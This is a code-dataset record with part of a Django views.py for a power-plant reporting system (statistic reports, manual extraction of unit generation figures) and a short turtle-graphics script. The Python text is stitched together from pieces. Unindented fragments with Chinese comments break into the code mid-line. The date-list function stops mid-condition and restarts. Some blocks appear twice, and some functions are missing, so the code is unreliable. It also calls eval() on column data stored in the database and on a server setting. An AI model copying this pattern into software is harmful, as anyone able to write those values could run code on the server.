def get_statistic_report(request):\n    \"\"\"\n    head_data: rowspan is 1 for a grouped column (if_group '是', several targets)\n    and 2 for a single-target column; colspan is the number of grouped targets:\n    [{\"col_name\": \"\", \"rowspan\": \"\", \"colspan\": \"\", \"targets\": [{\"name\": \"\"}, {\"name\": \"\"}]}]\n    body_data: the current values of all targets at one point in time:\n    [{\"date\": \"2020-01-31\", \"target_values\": []}, {\"date\": \"2020-01-30\", \"target_values\": []}]\n    \"\"\"\n    if request.user.is_authenticated():\n        start_date = request.POST.get(\"start_date\", \"\")\n        end_date = request.POST.get(\"end_date\", \"\")\n        search_id = request.POST.get(\"search_id\", \"\")\n        date_type = request.POST.get(\"date_type\", \"\")\n\n        # start_date = \"2020-01-01\"\n        # end_date = \"2020-01-31\"\n        # search_id = \"1\"\n\n        data = {}\n        status = 1\n        info = \"\"\n\n        head_data = [{\n            \"col_name\": \"Data date\",\n            \"rowspan\": 2,\n            \"colspan\": 1,\n            \"targets\": []\n        }]\n        body_data = []\n        v_sums = []  # totals row\n        if not start_date:\n            status = 0\n            info = \"Start date not selected.\"\n        elif not end_date:\n            status = 0\n            info = \"End date not selected.\"\n        elif not search_id:\n            status = 0\n            info = \"This page has expired; please reopen it.\"\n        else:\n            try:\n                start_date = getreporting_date(start_date, date_type)\n                end_date = getreporting_date(end_date, date_type)\n\n                target_statistic = TargetStatistic.objects.get(id=int(search_id))\n                col_data = target_statistic.col_data\n\n                \"\"\"\n                col_data is stored as the repr of a structure such as:\n                \"[{\n                    'name': 'b',\n                    'remark': '',\n                    'targets': [\n                        {'new_target_name': '#1 running time', 'target_id': '1884', 'cumulative_type': '0', 'target_name': '#1 running time'},\n                        {'new_target_name': '#2 running time', 'target_id': '1885', 'cumulative_type': '4', 'target_name': '#2 running time'}\n                    ]\n                }]\"\n                \"\"\"\n                try:\n                    # Stored as a Python repr (single quotes), so json.loads()\n                    # cannot parse it; eval() trusts database content here.\n                    col_data = eval(col_data)\n                except Exception as e:\n                    print(e)\n                else:\n                    \"\"\"\n                    After eval, e.g.:\n                    [{'name': 'column two', 'if_group': '否', 'remark': 'note for column two',\n                      'targets': [{'target_id': '21', 'target_name': 'heat-settlement-daily-entry-002'}]},\n                     {'name': 'column one', 'if_group': '是', 'remark': 'note for column one',\n                      'targets': [{'target_id': '21', 'new_target_name': '#1 unit', 'target_name': 'heat-settlement-daily-entry-002'},\n                                  {'target_id': '22', 'new_target_name': '#2 unit', 'target_name': 'heat-settlement-daily-entry-003'}]}]\n                    \"\"\"\n\n                    # All Meterdata / Entrydata / Extractdata / Calculatedata rows in the requested period.\n                    def get_target_values(operation_type, start_date, end_date, date_type):\n                        \"\"\"\n                        Fetch every row of one operation type inside the period,\n                        including ranges that cross or skip calendar years.\n                        :param operation_type:\n                        :param start_date:\n                        :param end_date:\n                        :return:\n                        \"\"\"\n                        data = []\n                        model_map = {\n                            \"1\": \"Meterdata\",\n                            \"15\": \"Entrydata\",\n                            \"16\": \"Extractdata\",\n                            \"17\": \"Calculatedata\",\n                        }\n
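                        # getmodels(name, year) is assumed (defined earlier in this\n                        # module) to return the year-sharded model class, e.g.\n                        # getmodels(\"Meterdata\", \"2019\") for the 2019 table; cross-year\n                        # ranges are therefore stitched from per-year queries below.\n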
\"curvalue\", \"cumulativemonth\", \"cumulativequarter\", \"cumulativehalfyear\", \"cumulativeyear\",\n \"target_id\", \"datadate\", \"target__digit\", \"target__cycletype\", \"target__cumulative\"\n )\n target_val.extend(start_target_val)\n target_val.extend(end_target_val)\n # 2017 2019 2\n if delta_year > 1: # 隔年\n for i in range(0, delta_year):\n start_date_year += 1\n start_date = datetime.datetime(start_date_year, 1, 1)\n middle_target_val = getmodels(model_name, str(start_date_year)).objects.exclude(state=\"9\").filter(datadate__gte=start_date.date()).values(\n \"curvalue\", \"cumulativemonth\", \"cumulativequarter\", \"cumulativehalfyear\", \"cumulativeyear\",\n \"target_id\", \"datadate\", \"target__digit\", \"target__cycletype\", \"target__cumulative\"\n )\n if middle_target_val:\n target_val.extend(middle_target_val)\n else: # 跨年\n pass\n data = [{\n \"id\": tv[\"target_id\"],\n \"cumulative\": tv[\"target__cumulative\"],\n \"curvalue\": float(round(tv[\"curvalue\"] if tv[\"curvalue\"] else 0, tv[\"target__digit\"])),\n \"cumulativemonth\": float(round(tv[\"cumulativemonth\"] if tv[\"cumulativemonth\"] else 0, tv[\"target__digit\"])),\n \"cumulativequarter\": float(round(tv[\"cumulativequarter\"] if tv[\"cumulativequarter\"] else 0, tv[\"target__digit\"])),\n \"cumulativehalfyear\": float(round(tv[\"cumulativehalfyear\"] if tv[\"cumulativehalfyear\"] else 0, tv[\"target__digit\"])),\n \"cumulativeyear\": float(round(tv[\"cumulativeyear\"] if tv[\"cumulativeyear\"] else 0, tv[\"target__digit\"])),\n \"date\": \"{0:%Y-%m-%d}\".format(tv[\"datadate\"]) if tv[\"datadate\"] else \"\",\n } for tv in target_val]\n return sorted(data, key=lambda e: e.__getitem__('date'), reverse=True)\n\n meter_data = get_target_values('1', start_date, end_date, date_type)\n entry_data = get_target_values('15', start_date, end_date, date_type)\n extract_data = get_target_values('16', start_date, end_date, date_type)\n calculate_data = get_target_values('17', start_date, end_date, date_type)\n\n all_data = {\n \"1\": meter_data,\n \"15\": entry_data,\n \"16\": extract_data,\n \"17\": calculate_data,\n }\n\n # head_data\n for cd in col_data:\n head_targets = []\n col_name = cd[\"name\"]\n targets = cd[\"targets\"]\n colspan = len(targets)\n if colspan > 1:\n rowspan = 1\n else:\n rowspan = 2\n for target in targets:\n target_unity = Target.objects.filter(id=target['target_id']).first().unity\n target_name = target['target_name'] + ' (' + target_unity + ')'\n target['new_target_name'] = target_name\n head_targets.append(target)\n\n head_data.append({\n \"col_name\": col_name,\n \"rowspan\": rowspan,\n \"colspan\": colspan,\n \"targets\": head_targets\n })\n\n # body_data\n # 时间列表\n def get_date_list_during_period(start_time, end_time, date_type):\n \"\"\"\n 不同周期类型下,指定时间区间获取时间列表\n 日:每日\n 月:月最后一天\n 季:季最后一天\n 半年:半年最后一天\n 年:年最后一天\n @param start_time:\n @param end_time:\n @param date_type:\n @return date_list:\n \"\"\"\n date_list = []\n\n n = 0\n n_time = end_time\n if date_type == \"10\":\n while True:\n date_list.append(n_time)\n\n n_time -= datetime.timedelta(days=1)\n\n if n_time < start_time or n > 3 * 365: # 最大循环\n break\n n += 1\n if date_type == \"11\":\n while True:\n date_list.append(n_time)\n\n n_time -= relativedelta(months=1)\n n_time = get_last_day_in_month(n_time)\n\n if n_time < start_time or n > 3 * 365:\n break\n n += 1\n if date_type == \"12\":\n while True:\n date_list.append(n_time)\n\n n_time -= relativedelta(months=3)\n n_time = get_last_day_in_month(n_time)\n\n if n_time < start_time or 
                        date_list = []\n\n                        n = 0\n                        n_time = end_time\n                        if date_type == \"10\":  # day\n                            while True:\n                                date_list.append(n_time)\n\n                                n_time -= datetime.timedelta(days=1)\n\n                                if n_time < start_time or n > 3 * 365:  # hard iteration cap\n                                    break\n                                n += 1\n                        if date_type == \"11\":  # month\n                            while True:\n                                date_list.append(n_time)\n\n                                n_time -= relativedelta(months=1)\n                                n_time = get_last_day_in_month(n_time)\n\n                                if n_time < start_time or n > 3 * 365:\n                                    break\n                                n += 1\n                        if date_type == \"12\":  # quarter\n                            while True:\n                                date_list.append(n_time)\n\n                                n_time -= relativedelta(months=3)\n                                n_time = get_last_day_in_month(n_time)\n\n                                if n_time < start_time or n > 3 * 365:\n                                    break\n                                n += 1\n                        if date_type == \"13\":  # half-year\n                            while True:\n                                date_list.append(n_time)\n\n                                n_time -= relativedelta(months=6)\n                                n_time = get_last_day_in_month(n_time)\n\n                                if n_time < start_time or n > 3 * 365:\n                                    break\n                                n += 1\n                        if date_type == \"14\":  # year\n                            while True:\n                                date_list.append(n_time)\n\n                                n_time -= relativedelta(months=12)\n                                n_time = get_last_day_in_month(n_time)\n\n                                if n_time < start_time or n > 2000:\n                                    break\n                                n += 1\n\n                        return date_list\n\n                    date_list = get_date_list_during_period(start_date, end_date, date_type)\n\n                    all_targets = Target.objects.exclude(state=\"9\").values(\n                        \"id\", \"name\", \"operationtype\", \"cumulative\"\n                    )\n\n                    def get_target_info(target_id: str) -> dict:\n                        target_info = {}\n                        for t in all_targets:\n                            if str(t['id']) == target_id:\n                                target_info = t\n                                break\n                        return target_info\n\n                    def handle_target_data(date):\n                        target_values = []\n\n                        # Which stored field each cumulative_type selects.\n                        value_fields = {\n                            \"0\": \"curvalue\",\n                            \"1\": \"cumulativemonth\",\n                            \"2\": \"cumulativequarter\",\n                            \"3\": \"cumulativehalfyear\",\n                            \"4\": \"cumulativeyear\",\n                        }\n                        for cd in col_data:\n                            for target in cd[\"targets\"]:\n                                target_id = target[\"target_id\"]\n                                operation_type = get_target_info(target_id).get(\"operationtype\", \"\")\n                                try:\n                                    cur_data = all_data[operation_type]\n                                except Exception:\n                                    pass\n                                else:\n                                    has_value = False\n                                    for d in cur_data:\n                                        if str(d[\"id\"]) == target_id and d[\"date\"] == \"{:%Y-%m-%d}\".format(date):\n                                            field = value_fields.get(target[\"cumulative_type\"])\n                                            if field:\n                                                target_values.append({\n                                                    \"value\": d[field],\n                                                    \"cumulative\": d[\"cumulative\"],\n                                                })\n                                            has_value = True\n                                            break\n                                    if not has_value:\n                                        target_values.append({\n                                            \"value\": \"-\",\n                                            \"cumulative\": \"\",\n                                        })\n                        if target_values:\n                            return {\n                                \"date\": \"{:%Y-%m-%d}\".format(date),\n                                \"target_values\": target_values\n                            }\n\n                    pool = ThreadPoolExecutor(max_workers=100)  # one task per report date\n                    all_tasks = [pool.submit(handle_target_data, date) for date in date_list]\n                    for future in as_completed(all_tasks):\n                        if future.result():\n                            body_data.append(future.result())\n\n                    body_data = sorted(body_data, key=lambda e: e.__getitem__('date'), reverse=False)\n                    # Totals row (sum or mean, depending on the cumulative mode).\n                    if body_data:\n                        target_values_length = len(body_data[0][\"target_values\"])\n                        for i in range(0, target_values_length):\n                            v_sum = decimal.Decimal('0')\n                            cumulative = \"\"\n                            in_sum = 0  # number of values contributing to the total\n                            for bd in body_data:\n                                target_values = bd[\"target_values\"]\n                                c_v = target_values[i].get(\"value\", \"-\")\n                                pre_cumulative = target_values[i].get(\"cumulative\", \"-\")\n                                if pre_cumulative not in [\"-\", \"\"]:\n                                    cumulative = pre_cumulative\n                                if type(c_v) != str and c_v:\n                                    v_sum += decimal.Decimal(str(c_v))\n                                    in_sum += 1\n                            if cumulative == \"1\" or cumulative == \"5\":  # 1: sum, 5: sum of previous month (environmental-protection use)\n                                pass\n                            if cumulative in [\"0\", \"2\", \"4\"]:  # 0: not accumulated, 2: arithmetic mean, 4: non-zero arithmetic mean\n                                v_sum = v_sum / decimal.Decimal(str(in_sum)) if in_sum else 0\n                                v_sum = round(v_sum, 4)\n                            if cumulative == \"3\":  # weighted mean -> not implemented yet\n                                v_sum = \"/\"\n                            v_sums.append({\n                                \"v\": float(v_sum) if v_sum != \"/\" else \"/\"\n                            })  # TODO: also carry the aggregation type in the totals row\n
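                    # Worked example (illustrative): a column whose three dated values\n                    # are 2, 4 and 0 under cumulative \"2\" totals (2 + 4) / 2 = 3.0,\n                    # because zero and blank cells are skipped by the\n                    # `if type(c_v) != str and c_v` guard above.\n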
            except Exception as e:\n                status = 0\n                info = \"Failed to build report data: {0}\".format(e)\n        return JsonResponse({\n            \"status\": status,\n            \"info\": info,\n            \"data\": {\n                \"head_data\": head_data,\n                \"body_data\": body_data,\n                \"v_sums\": v_sums,\n            }\n        })\n    else:\n        return HttpResponseRedirect(\"/login\")\n\n\ndef electric_energy(request, funid):\n    if request.user.is_authenticated():\n        yestoday = \"{:%Y-%m-%d}\".format(datetime.datetime.now() - datetime.timedelta(days=1))\n\n        return render(request, \"electric_energy.html\", {\n            \"yestoday\": yestoday,\n            \"username\": request.user.userinfo.fullname,\n            \"pagefuns\": getpagefuns(funid, request)\n        })\n    else:\n        return HttpResponseRedirect(\"/login\")\n\n\ndef get_electric_energy_target_info():\n    \"\"\"\n    Metadata of the two generation targets, e.g. how many digits to keep.\n    :return:\n    \"\"\"\n    f_info = {\n        \"digit\": 2,\n    }\n    s_info = {\n        \"digit\": 2,\n    }\n    F_ELERTRIC_ENERGY = settings.F_ELERTRIC_ENERGY\n    S_ELERTRIC_ENERGY = settings.S_ELERTRIC_ENERGY\n\n    f_targets = Target.objects.exclude(state=\"9\").filter(code=F_ELERTRIC_ENERGY)\n\n    if f_targets.exists():\n        f_target = f_targets[0]\n        f_info[\"digit\"] = f_target.digit\n\n    s_targets = Target.objects.exclude(state=\"9\").filter(code=S_ELERTRIC_ENERGY)\n    if s_targets:\n        s_target = s_targets[0]\n        s_info[\"digit\"] = s_target.digit\n\n    return f_info, s_info\n\n\ndef get_electric_energy(request):\n    if request.user.is_authenticated():\n        result = []\n\n        # digits kept for the #1 / #2 generation values\n        f_info, s_info = get_electric_energy_target_info()\n        f_digit = f_info.get('digit', 2)\n        s_digit = s_info.get('digit', 2)\n        electric_energys = ElectricEnergy.objects.exclude(state=\"9\").order_by(\"-extract_time\")\n        for electric_energy in electric_energys:\n            f_electric_energy = float(round(electric_energy.f_electric_energy, f_digit)) if electric_energy.f_electric_energy else 0\n            s_electric_energy = float(round(electric_energy.s_electric_energy, s_digit)) if electric_energy.s_electric_energy else 0\n            result.append({\n                \"id\": electric_energy.id,\n                \"extract_time\": \"{0:%Y-%m-%d}\".format(electric_energy.extract_time) if electric_energy.extract_time else \"\",\n                \"f_electric_energy\": f_electric_energy,\n                \"s_electric_energy\": s_electric_energy,\n                \"a_electric_energy\": round(f_electric_energy + s_electric_energy, f_digit),\n            })\n        return JsonResponse({\n            \"data\": result\n        })\n    else:\n        return HttpResponseRedirect(\"/login\")\n\n\n
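# Note on the soft-delete convention used throughout this module: rows are\n# never physically removed; state=\"9\" marks them deleted and every read\n# filters with .exclude(state=\"9\"). save_electric_energy below relies on this\n# to supersede earlier rows recorded for the same day.\n\n\n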
\"s_electric_energy\": s_electric_energy,\n \"a_electric_energy\": a_electric_energy,\n \"extract_time\": extract_time,\n })\n\n return JsonResponse({\n \"status\": status,\n \"info\": info,\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef electric_energy_del(request):\n if request.user.is_authenticated():\n status = 1\n info = '删除成功。'\n id = request.POST.get('id', '')\n try:\n ElectricEnergy.objects.filter(id=int(id)).update(**{\n \"state\": \"9\"\n })\n except:\n status = 0\n info = '删除失败。'\n\n return JsonResponse({\n 'status': status,\n 'info': info\n })\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef extract_electric_energy(request):\n \"\"\"\n 手动提取指定时间段的发电量\n @param request:\n @return:\n \"\"\"\n if request.user.is_authenticated():\n status = 1\n info = '提取成功。'\n data = {}\n\n def check_time(start_time, end_time):\n \"\"\"\n 检测时间\n @param start_time:\n @param end_time:\n @return is_fine:\n \"\"\"\n is_fine = True\n err = ''\n if not start_time:\n is_fine = False\n err = \"开始时间未选择\"\n elif not end_time:\n is_fine = False\n err = \"结束时间未选择\"\n else:\n start_time = datetime.datetime.strptime(start_time, \"%Y-%m-%d %H:%M:%S\")\n end_time = datetime.datetime.strptime(end_time, \"%Y-%m-%d %H:%M:%S\")\n if start_time > end_time:\n is_fine = False\n err = \"开始时间不得晚于结束时间\"\n return is_fine, err\n\n def do_extract(start_time, end_time, f=True):\n \"\"\"\n #1机组 #2机组 发电量取数\n @param start_time:\n @param end_time:\n @param f: f表示#1机组 s表示#2机组\n @return: electric_energy_value\n \"\"\"\n electric_energy_value = 0\n\n if f: # #1\n t_code = settings.F_ELERTRIC_ENERGY\n t_tag = settings.F_TAG\n else: # #2\n t_code = settings.S_ELERTRIC_ENERGY\n t_tag = settings.S_TAG\n\n ts = Target.objects.exclude(state=\"9\").filter(code=t_code)\n if ts.exists():\n t = ts[0]\n\n s_con = settings.PI_SERVER\n\n if s_con:\n try:\n s_con = eval(s_con)\n if type(s_con) == list:\n s_con = s_con[0]\n except Exception as e:\n pass\n else:\n pi_query = PIQuery(s_con)\n result, err = pi_query.get_delta_time_data(start_time, end_time, t, t_tag)\n if not err and result:\n electric_energy_value = result[0][0]\n return electric_energy_value\n\n f_checkbox = request.POST.get('f_checkbox', '')\n s_checkbox = request.POST.get('s_checkbox', '')\n\n f_start_time1 = request.POST.get('f_start_time1', '')\n f_start_time2 = request.POST.get('f_start_time2', '')\n f_start_time3 = request.POST.get('f_start_time3', '')\n f_start_time4 = request.POST.get('f_start_time4', '')\n\n f_end_time1 = request.POST.get('f_end_time1', '')\n f_end_time2 = request.POST.get('f_end_time2', '')\n f_end_time3 = request.POST.get('f_end_time3', '')\n f_end_time4 = request.POST.get('f_end_time4', '')\n\n s_start_time1 = request.POST.get('s_start_time1', '')\n s_start_time2 = request.POST.get('s_start_time2', '')\n s_start_time3 = request.POST.get('s_start_time3', '')\n s_start_time4 = request.POST.get('s_start_time4', '')\n\n s_end_time1 = request.POST.get('s_end_time1', '')\n s_end_time2 = request.POST.get('s_end_time2', '')\n s_end_time3 = request.POST.get('s_end_time3', '')\n s_end_time4 = request.POST.get('s_end_time4', '')\n\n f_electric_energy = decimal.Decimal(\"0\")\n s_electric_energy = decimal.Decimal(\"0\")\n if f_checkbox == \"on\":\n if not any([f_start_time1, f_start_time2, f_start_time3, f_start_time4,\n f_end_time1, f_end_time2, f_end_time3, f_end_time4]):\n return JsonResponse({\n 'status': 0,\n 'info': '开机状态时,#1机组入网时间至少要选择一组。'\n })\n\n if any([f_start_time1, f_end_time1]):\n is_fine, err = check_time(f_start_time1, 
        if f_checkbox == \"on\":\n            if not any([f_start_time1, f_start_time2, f_start_time3, f_start_time4,\n                        f_end_time1, f_end_time2, f_end_time3, f_end_time4]):\n                return JsonResponse({\n                    'status': 0,\n                    'info': 'While unit #1 is on, at least one grid-connection window must be chosen.'\n                })\n\n            f_windows = [(f_start_time1, f_end_time1), (f_start_time2, f_end_time2),\n                         (f_start_time3, f_end_time3), (f_start_time4, f_end_time4)]\n            for idx, (w_start, w_end) in enumerate(f_windows, start=1):\n                if any([w_start, w_end]):\n                    is_fine, err = check_time(w_start, w_end)\n                    if not is_fine:\n                        return JsonResponse({\n                            'status': 0,\n                            'info': 'Extraction failed, unit #1 grid-connection window {0}: {1}.'.format(idx, err),\n                        })\n                    else:\n                        f_electric_energy += do_extract(w_start, w_end, f=True)\n        if s_checkbox == \"on\":\n            if not any([s_start_time1, s_start_time2, s_start_time3, s_start_time4,\n                        s_end_time1, s_end_time2, s_end_time3, s_end_time4]):\n                return JsonResponse({\n                    'status': 0,\n                    'info': 'While unit #2 is on, at least one grid-connection window must be chosen.'\n                })\n            s_windows = [(s_start_time1, s_end_time1), (s_start_time2, s_end_time2),\n                         (s_start_time3, s_end_time3), (s_start_time4, s_end_time4)]\n            for idx, (w_start, w_end) in enumerate(s_windows, start=1):\n                if any([w_start, w_end]):\n                    is_fine, err = check_time(w_start, w_end)\n                    if not is_fine:\n                        return JsonResponse({\n                            'status': 0,\n                            'info': 'Extraction failed, unit #2 grid-connection window {0}: {1}.'.format(idx, err),\n                        })\n                    else:\n                        s_electric_energy += do_extract(w_start, w_end, f=False)\n\n        return JsonResponse({\n            'status': status,\n            'info': info,\n            'data': {\n                'f_electric_energy': float(f_electric_energy),\n                's_electric_energy': float(s_electric_energy)\n            },\n        })\n    else:\n        return HttpResponseRedirect(\"/login\")\n","sub_path":"datacenter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":552059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"203486653","text":"import turtle\r\n\r\ndef draw_square():\r\n    window = turtle.Screen()\r\n    window.bgcolor(\"red\")\r\n\r\n    brad = turtle.Turtle()\r\n    brad.shape(\"turtle\")\r\n    brad.color(\"green\")\r\n    brad.speed(2)\r\n\r\n    line = 1\r\n    while line < 5:  # four sides of the square\r\n        brad.forward(100)\r\n        brad.right(90)\r\n        line = line + 1\r\n\r\n    window.exitonclick()\r\n\r\ndraw_square()\r\n","sub_path":"3_mindstorms.py","file_name":"3_mindstorms.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}